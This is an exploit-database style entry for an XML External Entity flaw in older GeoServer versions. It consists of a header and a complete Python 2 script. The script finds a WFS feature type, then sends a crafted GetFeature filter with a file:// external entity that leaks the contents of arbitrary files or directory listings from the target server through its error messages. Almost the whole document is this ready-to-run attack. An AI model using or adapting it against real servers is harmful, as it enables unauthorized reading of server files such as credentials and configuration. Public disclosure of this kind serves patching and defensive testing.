Geoserver < 2.7.1.1 / < 2.6.4 / < 2.5.5.1 - XML External Entity

# Exploit Title : GeoServer XXE
# Date : 11/08/2015
# Exploit Author : David Bloom (Script) - (Ping to Sven Claessens, Jacques Villemur and Eric Donners)
# Vendor homepage : http://geoserver.org
# Software Link : http://geoserver.org/release/stable
# Version : 2.7 : <2.7.1.1  / 2.6 : <2.6.4 / 2.5 : <2.5.5.1 
# Tested : Client Windows, Server Linux/Jetty  
# Vendor bug track : GEOS-7032
# CVE : No CVE
# Category : Webapps
# Description : An XXE vulnerability in geoserver allows to view file contents and list directories on the server.


from xml.etree import ElementTree
import sys
import urllib2
import urllib

def main():
    print '\n-----------------------\nGeoServer XXE Exploit\nScript by David Bloom\nTwitter: @philophobia78\n-----------------------\n' 
    if len(sys.argv) != 3 :
        print "Usage geoserver-xxe.py [URL] [File Or Dir]"
        return
    geoServerUrl = sys.argv[1]
    fileName = sys.argv[2]

    featuresUrl = geoServerUrl + "/wfs?request=GetCapabilities"
    exploitUrl = geoServerUrl + "/wfs?request=GetFeature&SERVICE=WFS&VERSION=1.0.0&TYPENAME=@candidateFeature@&FILTER=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%20%3C!DOCTYPE%20foo%20[%20%3C!ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F@targetFile@%22%20%3E]%3E%3CFilter%20%3E%3CPropertyIsEqualTo%3E%3CPropertyName%3E%26xxe%3B%3C%2FPropertyName%3E%3CLiteral%3EBrussels%3C%2FLiteral%3E%3C%2FPropertyIsEqualTo%3E%3C%2FFilter%3E"
    
    response = urllib2.urlopen(featuresUrl)
    root = ElementTree.fromstring(response.read())

    print "Searching geoserver features ... : \n"
    gsFeatures = [] 
    for node in root.iter():
        if 'FeatureTypeList' in node.tag  :
            for feature in node.iter():
                if 'Name' in feature.tag :
                    gsFeatures.append(feature.text)
                    print "Feature found :" + feature.text
    if not gsFeatures:
        print "No geoserver feature found, wrong url ?"
        return
		
    print "\nCandidate used : " + gsFeatures[0] + "\n"
    print "Trying XXE : "
    print "-------------\n"
    exploitUrl = exploitUrl.replace("@candidateFeature@",gsFeatures[0])
    exploitUrl = exploitUrl.replace("@targetFile@",fileName)
    print exploitUrl + "\n\n"
    try :
        response = urllib2.urlopen(exploitUrl)
        # Clean output from exceptions string
        trashOutput = response.read()
        beginRef = "Illegal property name:"
        endRef  =  "for feature type"
        fileStart = trashOutput.index(beginRef) + len(beginRef)
        fileStop = trashOutput.index(endRef)
        print "Output"
        print "-------\n"
        print trashOutput[fileStart:fileStop].strip()
    except : 
        print "An error occured, maybe a premission error"

if __name__ == '__main__':
    main()